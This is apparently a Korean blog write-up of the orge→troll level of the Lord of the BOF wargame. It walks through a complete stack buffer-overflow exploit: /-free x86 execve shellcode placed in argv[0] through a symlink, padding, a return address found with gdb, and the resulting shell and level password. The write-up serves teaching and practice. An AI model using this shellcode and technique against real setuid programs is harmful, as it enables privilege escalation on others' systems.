8. orge → troll

[orge@localhost orge]$ cat -n troll.c 
     1	/*
     2	        The Lord of the BOF : The Fellowship of the BOF
     3	        - troll
     4	        - check argc + argv hunter
     5	*/
     6	
     7	#include <stdio.h>
     8	#include <stdlib.h>
     9	
    10	extern char **environ;
    11	
    12	main(int argc, char *argv[])
    13	{
    14		char buffer[40];
    15		int i;
    16	
    17		// here is changed
    18		if(argc != 2){
    19			printf("argc must be two!\n");
    20			exit(0);
    21		}
    22	
    23		// egghunter 
    24		for(i=0; environ[i]; i++)
    25			memset(environ[i], 0, strlen(environ[i]));
    26	
    27		if(argv[1][47] != '\xbf')
    28		{
    29			printf("stack is still your friend.\n");
    30			exit(0);
    31		}
    32	
    33		// check the length of argument
    34		if(strlen(argv[1]) > 48){
    35			printf("argument is too long!\n");
    36			exit(0);
    37		}
    38	
    39		strcpy(buffer, argv[1]); 
    40		printf("%s\n", buffer);
    41	
    42	        // buffer hunter
    43	        memset(buffer, 0, 40);
    44	
    45		// one more!
    46		memset(argv[1], 0, strlen(argv[1]));
    47	}

 

18~21코드를 통해 argv인자를 2개만 받아올 수 있게 해놨군요.

ex) ./test 1234 (o)

     ./test 1234 5678 (x)

 

또한, 46코드에 프로그램 종료직전 argv[1]을 초기화 해줌으로써 더이상 우리의 친구 argv[1]을 이용할수가 없겠네요

 

 

혹시 이전 문제에서 심볼릭 링크롤 통해서 argv[0](실행 파일명)의 길이를 바꿔준것 기억 하시나요?

그렇다면 이번에는 argv[0]에 쉘코드를 입력하여 문제를 풀어봅시다.

 

 

 

우선, 알아둬야 할게 우리가 기존에 사용하던 쉘코드(24byte) 속에는 \x2f가 포함되어있을겁니다.

\x2f는 문자로 슬래쉬 "/" 입니다. (https://www.rapidtables.com/convert/number/hex-to-ascii.html)

아시다시피 "/"는 리눅스에서 디렉터리 구분에 이용되는 문자죠..

이래서 기존 쉘코드로 설정해줄경우 오류가 생깁니다.

[orge@localhost orge]$ `python -c 'print "ln -s test " + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
ln: cannot create symbolic link `1󿿐h//shh/bin⏓ᙰ
                                               ̀' to `test': No such file or directory

 

 

 

따라서, 이번 문제에서는 \x2f가 없는 쉘코드를 사용해야겠네요.

https://d4m0n.tistory.com/62

[Linux/x86] Shellcode without 0x2f

 

 

[orge@localhost orge]$ `python -c 'print "ln -s test " + "\x31\xc0\x50\xbe\x2e\x2e\x72\x67\x81\xc6\x01\x01\x01\x01\x56\xbf\x2e\x62\x69\x6e\x47\x57\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ls -l
total 36
lrwxrwxrwx    1 orge     orge            4 Dec 13 03:29 1󿿐¾..rg?Ŀ???V¿.binGW?⎿ᑿᮿ˿ -> test
-rwsr-sr-x    1 orge     orge        12693 Dec 13 03:28 test
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c

이렇게 성공적으로 심볼릭 링크가 걸리네요.

 

 

test파일을 통하여 argv[0] addr를 찾아내고 바로 적용시키면 되겠네요.

공격 코드
argv[0]	argv[1]
./쉘코드	"A"(dummy 44byte)	ret(argv[0] addr)

 

 

 

 

 

[orge@localhost orge]$ `python -c 'print "./\x31\xc0\x50\xbe\x2e\x2e\x72\x67\x81\xc6\x01\x01\x01\x01\x56\xbf\x2e\x62\x69\x6e\x47\x57\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 " + "A"*44 + "\x14\xfc\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
Segmentation fault (core dumped)
[orge@localhost orge]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./1󿿐¾..rgāV¿.binGW␉ᓉ
                                           ᱍ e                                        '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffd6 in ?? ()
(gdb) x/40wx $esp
0xbffffaa0:	0x00000000	0xbffffae4	0xbffffaf0	0x40013868
0xbffffab0:	0x00000002	0x08048450	0x00000000	0x08048471
0xbffffac0:	0x08048500	0x00000002	0xbffffae4	0x08048390
0xbffffad0:	0x0804866c	0x4000ae60	0xbffffadc	0x40013e90
0xbffffae0:	0x00000002	0xbffffbe0	0xbffffc05	0x00000000
0xbffffaf0:	0xbffffc36	0xbffffc45	0xbffffc5d	0xbffffc7c
0xbffffb00:	0xbffffc9e	0xbffffca8	0xbffffe6b	0xbffffe8a
0xbffffb10:	0xbffffea4	0xbffffeb9	0xbffffed5	0xbffffee0
0xbffffb20:	0xbffffef9	0xbfffff06	0xbfffff0e	0xbfffff18
0xbffffb30:	0xbfffff28	0xbfffff36	0xbfffff44	0xbfffff55
(gdb) x/s 0xbffffbe0
0xbffffbe0:	 "./1󿿐¾..rg\201Ŝ001\001\001\001V¿.binGW\211⏜211ᒜ211ᯜ013̜200"
(gdb) x/s 0xbffffbe2
0xbffffbe2:	 "1󿿐¾..rg\201Ŝ001\001\001\001V¿.binGW\211⏜211ᒜ211ᯜ013̜200"

 

코드를 정상적으로 실행시키기 위해선 argv[0] 주소에서 "./"를 건너뛴 주소인, argv[0]+2를 덮어야겠네요.

 

 

 

 

이제 torll파일과 심볼릭 링크를 다시 걸어서 코드를 실행키겨볼까요

[orge@localhost orge]$ `python -c 'print "rm \x31\xc0\x50\xbe\x2e\x2e\x72\x67\x81\xc6\x01\x01\x01\x01\x56\xbf\x2e\x62\x69\x6e\x47\x57\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ls
test  troll  troll.c
[orge@localhost orge]$ `python -c 'print "ln -s troll \x31\xc0\x50\xbe\x2e\x2e\x72\x67\x81\xc6\x01\x01\x01\x01\x56\xbf\x2e\x62\x69\x6e\x47\x57\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"'`
[orge@localhost orge]$ ls -l
total 36
lrwxrwxrwx    1 orge     orge            5 Dec 13 03:36 1󿿐¾..rg?Ŀ???V¿.binGW?⎿ᑿᮿ˿ -> troll
-rwsr-sr-x    1 orge     orge        12693 Dec 13 03:28 test
-rwsr-sr-x    1 troll    troll       12693 Mar  1  2010 troll
-rw-r--r--    1 root     root          772 Mar 29  2010 troll.c
[orge@localhost orge]$ `python -c 'print "./\x31\xc0\x50\xbe\x2e\x2e\x72\x67\x81\xc6\x01\x01\x01\x01\x56\xbf\x2e\x62\x69\x6e\x47\x57\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 " + "A"*44 + "\xe2\xfb\xff\xbf"'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA㼿¿
bash$ whoami
troll
bash$ my-pass
euid = 508
aspirin

 

 

네, 이지하게 쉘이 실행되는 모습입니다.

+ 시작전에 bash2로 바꿔주고 문제풀이 하시는거 잊지 않으셨죠?